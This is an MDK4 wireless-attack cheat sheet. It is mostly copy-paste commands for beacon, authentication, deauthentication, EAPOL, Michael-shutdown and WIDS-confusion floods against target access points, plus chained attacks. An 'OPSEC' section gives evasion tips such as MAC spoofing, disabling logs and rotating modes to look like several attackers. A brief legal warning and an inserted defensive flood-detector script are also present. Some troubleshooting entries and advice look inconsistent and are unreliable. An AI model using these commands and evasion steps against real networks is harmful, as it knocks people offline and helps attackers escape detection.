MDK4

# Install dependencies (Ubuntu/Debian)
sudo apt-get install build-essential libpcap-dev aircrack-ng

# Clone and compile MDK4
git clone https://github.com/aircrack-ng/mdk4.git
cd mdk4
make
sudo make install

# Verify installation
mdk4 --version

# Check wireless interfaces
iwconfig
ip link show

# Enable monitor mode on wlan0
sudo airmon-ng start wlan0

# Or manually with iw (the interface keeps the name wlan0)
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

# Verify monitor mode active
iwconfig
# Output should show "Mode:Monitor"

# Disable monitor mode
sudo airmon-ng stop wlan0mon

# Or manually revert
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 up

# Help and version info
mdk4 --help
mdk4 --version

# List available attack modes
mdk4 wlan0mon --help

# General syntax
mdk4 <interface> <attack_mode> [options] <target>

Flood network with fake beacons, creating ghost networks and confusing clients.

# Basic beacon flood on all channels
mdk4 wlan0mon b

# Beacon flood with custom SSID file
mdk4 wlan0mon b -f ssid_list.txt

# Flood specific channel
mdk4 wlan0mon b -c 6

# Flood multiple channels
mdk4 wlan0mon b -c 1,6,11

# Set beacon interval (milliseconds)
mdk4 wlan0mon b -i 100

# Specify output interface (if multiple)
mdk4 wlan0mon b -B wlan0mon

Flood target with authentication requests, exhausting AP resources.

# Basic authentication DoS
mdk4 wlan0mon a -t <target_BSSID>

# Auth DoS on specific channel
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -c 6

# Flood with custom auth rate (packets/sec)
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -n 100

# Target multiple APs
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -t 11:22:33:44:55:66

Broadcast probe requests for networks in a wordlist, testing for hidden SSIDs.

# Probe with SSID list
mdk4 wlan0mon p -f wordlist.txt

# Probe specific SSID
mdk4 wlan0mon p -s "MyNetwork"

# Probe on single channel
mdk4 wlan0mon p -f wordlist.txt -c 6

# Specify probe interval (milliseconds)
mdk4 wlan0mon p -f wordlist.txt -i 50

Force clients to disconnect from target AP.

# Deauth all clients on target AP
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF

# Deauth specific client
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66

# Deauth with custom frame count
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 -n 100

# Deauth on specific channel
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -C 6
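
Seen from the defender's side, the beacon, authentication and deauthentication floods above each leave a distinct management-frame pattern. The following is an added example (not part of the original page or of the MDK4 project) that classifies them per time window; it assumes frames start at the 802.11 MAC header with any radiotap header already stripped, and the thresholds, function names and sample MAC addresses are illustrative assumptions.

```python
from collections import defaultdict

BEACON, AUTH, DEAUTH = 0x8, 0xB, 0xC     # 802.11 management subtypes

def parse_mgmt(frame: bytes):
    """Return (subtype, source MAC, BSSID) for a management frame, else None."""
    if len(frame) < 24:                  # shorter than the fixed MAC header
        return None
    fc = frame[0]
    if (fc >> 2) & 0x3 != 0:             # type bits: 0 = management
        return None
    return (fc >> 4) & 0xF, frame[10:16].hex(":"), frame[16:22].hex(":")

def detect(frames, window=1.0, deauth_max=10, auth_srcs_max=20, bssid_max=30):
    """frames: iterable of (timestamp_seconds, raw_bytes). Returns sorted alerts."""
    deauth = defaultdict(int)            # (bucket, bssid) -> deauth frame count
    auth_srcs = defaultdict(set)         # (bucket, bssid) -> distinct senders
    beacons = defaultdict(set)           # bucket -> distinct beaconing BSSIDs
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None:
            continue
        subtype, src, bssid = parsed
        bucket = int(ts // window)
        if subtype == DEAUTH:
            deauth[bucket, bssid] += 1
        elif subtype == AUTH:
            auth_srcs[bucket, bssid].add(src)
        elif subtype == BEACON:
            beacons[bucket].add(bssid)
    alerts = {("deauth_flood", b) for (_, b), n in deauth.items() if n > deauth_max}
    alerts |= {("auth_flood", b) for (_, b), s in auth_srcs.items()
               if len(s) > auth_srcs_max}
    if any(len(s) > bssid_max for s in beacons.values()):
        alerts.add(("beacon_flood", "*"))
    return sorted(alerts)

def mk(subtype, src, bssid, dst="ff:ff:ff:ff:ff:ff"):
    """Build a constructed 24-byte management header (sample data only)."""
    raw = lambda mac: bytes.fromhex(mac.replace(":", ""))
    return bytes([subtype << 4, 0, 0, 0]) + raw(dst) + raw(src) + raw(bssid) + b"\x00\x00"

AP = "02:00:00:00:00:01"                 # constructed, locally administered MAC

def sample():
    """Constructed capture: deauth burst, many-sender auth burst, normal beacons."""
    frames = [(0.01 * i, mk(DEAUTH, AP, AP)) for i in range(50)]
    frames += [(2 + 0.01 * i, mk(AUTH, "02:00:00:00:01:%02x" % i, AP)) for i in range(40)]
    frames += [(5 + i, mk(BEACON, AP, AP)) for i in range(5)]
    return frames

if __name__ == "__main__":
    print(detect(sample()))
```

Thresholds need tuning against a baseline of the monitored site. Enabling Protected Management Frames (802.11w) on the AP and clients is the standard mitigation for forged deauthentication frames.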

Trigger Michael frame errors to disable TKIP encryption and force downgrade.

# Basic Michael shutdown
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF

# Michael attack on specific client
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66

# Set attack rate
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF -n 100

Send EAPOL Start frames to initiate authentication handshakes.

# Basic EAPOL Start flood
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF

# EAPOL with custom source MAC
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF -s 00:11:22:33:44:55

# Set EAPOL interval
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF -i 50

Exploit WIDS (Wireless Intrusion Detection) by sending fuzzy/malformed frames.

# WIDS confusion mode
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF

# Fuzzy frame generation
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF --fuzzy

# Target specific WIDS sensor
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF -c 6

# Target specific AP by BSSID
mdk4 wlan0mon b -t AA:BB:CC:DD:EE:FF

# Target specific client MAC
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66

# Exclude specific BSSID
mdk4 wlan0mon b --bssid-file exclude.txt

# Target by SSID name (if known)
mdk4 wlan0mon d -s "TargetNetwork"

# Multiple targets
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -t 11:22:33:44:55:66 -t 99:88:77:66:55:44

# Single channel
mdk4 wlan0mon b -c 6

# Multiple channels
mdk4 wlan0mon b -c 1,6,11,36,40,44,48

# All 2.4GHz channels
mdk4 wlan0mon b -c 1-13

# 5GHz UNII bands
mdk4 wlan0mon b -c 36-165

# No channel restriction (all bands)
mdk4 wlan0mon b

# Set frame rate (packets per second)
mdk4 wlan0mon b -n 1000

# Millisecond interval between frames
mdk4 wlan0mon b -i 10

# Slow rate for OPSEC
mdk4 wlan0mon b -n 50 -i 100

# Aggressive rate
mdk4 wlan0mon b -n 5000 -i 1

# Custom source MAC for beacons
mdk4 wlan0mon b -s 00:11:22:33:44:55

# Random MAC per frame
mdk4 wlan0mon b --random-mac

# Fixed BSSID in beacons
mdk4 wlan0mon b -B AA:BB:CC:DD:EE:FF

# Verbose output
mdk4 wlan0mon b -v

# Show packet details
mdk4 wlan0mon b -d

# Duration/time limit (seconds)
timeout 300 mdk4 wlan0mon b

# Output to file for analysis
mdk4 wlan0mon b -o attack.log

# Background execution
mdk4 wlan0mon b &

MDK4 performs DoS attacks against wireless networks. Only use on networks you own or have explicit written permission to test. Unauthorized use violates:

  • Computer Fraud and Abuse Act (CFAA) in the US
  • Computer Misuse Act in the UK
  • Similar laws in most jurisdictions

# Use VPN/Tor if testing remote networks (never your home IP)
# Spoof MAC address to avoid tracking
sudo macchanger -r wlan0mon

# Use minimal output to reduce detection
mdk4 wlan0mon b -c 6 > /dev/null

# Disable logging of attacks
mdk4 wlan0mon b --nolog

# Time attacks during high traffic periods
# Launch during peak hours (less suspicious)

# Exit cleanly and restore interface
sudo airmon-ng stop wlan0mon
sudo systemctl restart networking

  • Vary attack parameters (channels, rates, timing)
  • Avoid flooding from single source MAC
  • Rotate attack modes to appear as multiple actors
  • Do not target production networks during business hours
  • Leave adequate gaps between attacks
  • Monitor for WIDS alerts during testing

# Multi-channel beacon flood with custom SSIDs
mdk4 wlan0mon b -f wordlist.txt -c 1-13 -n 500

# Deauth + beacon flood (run in parallel)
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF &
mdk4 wlan0mon b -c 6 &
wait

# SSID enumeration + probe analysis
mdk4 wlan0mon p -f wordlist.txt -v

# Michael shutdown before deauth
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF &
sleep 5
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF &
wait

| Issue | Solution |
|---|---|
| "wlan0mon: No such device" | Run sudo airmon-ng start wlan0 to create monitor interface |
| Attacks fail silently | Check iwconfig for Monitor mode, verify channel, try -v flag |
| High CPU usage | Reduce rate (-n) or interval (-i) values |
| Packets not sending | Disable software encryption: sudo rfkill unblock all |
| Cannot target specific AP | Verify BSSID with sudo airodump-ng wlan0mon first |
| Connection to WIDS/IPS | Use fuzzy mode (w --fuzzy) or vary channels/rates |

  • aircrack-ng — Full WiFi security suite (airodump, aireplay, airmon)
  • hashcat — Password cracking for captured handshakes
  • Wireshark — Packet analysis and inspection
  • hcxdumptool — Extract hash-mode 22000 from PCAP for hashcat
  • hostapd — Create rogue AP for evil twin attacks